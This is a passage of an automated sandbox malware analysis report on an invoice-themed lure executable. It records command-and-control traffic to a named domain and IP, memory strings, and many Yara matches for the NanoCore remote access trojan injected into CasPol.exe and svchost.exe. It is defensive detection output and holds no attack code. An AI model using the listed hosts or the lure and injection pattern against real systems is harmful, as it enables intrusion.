        Source: global traffic HTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1 Host: coroloboxorozor.com
        Source: Joe Sandbox View IP Address: 172.67.172.17
        Source: Joe Sandbox View IP Address: 185.157.161.86
        Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
        Source: unknown TCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknown DNS traffic detected: queries for: coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html
        Source: powershell.exe, 00000005.00000003.877512223.0000000009A1C000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.938217593.0000000004EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000003.748547781.0000000005A2C000.00000004.00000001.sdmpString found in binary or memory: https://go.microd:
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
        Source: CasPol.exe, 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287994.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A269B0 NtSetInformationThread,0_2_08A269B0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A27152 NtSetInformationThread,0_2_08A27152
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: invalid certificate
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287994.exeBinary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.848479319.0000000000BF2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNbTfoyms.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.964968440.00000000065B0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCngH Tzy.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.949930173.0000000004EF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
